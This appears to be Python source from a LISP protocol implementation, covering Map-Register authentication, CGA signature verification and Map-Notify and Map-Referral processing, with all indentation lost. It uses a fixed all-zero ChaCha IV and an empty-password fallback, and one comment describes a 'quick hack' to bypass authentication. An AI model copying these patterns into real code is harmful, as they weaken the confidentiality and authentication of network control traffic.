pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is regitered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
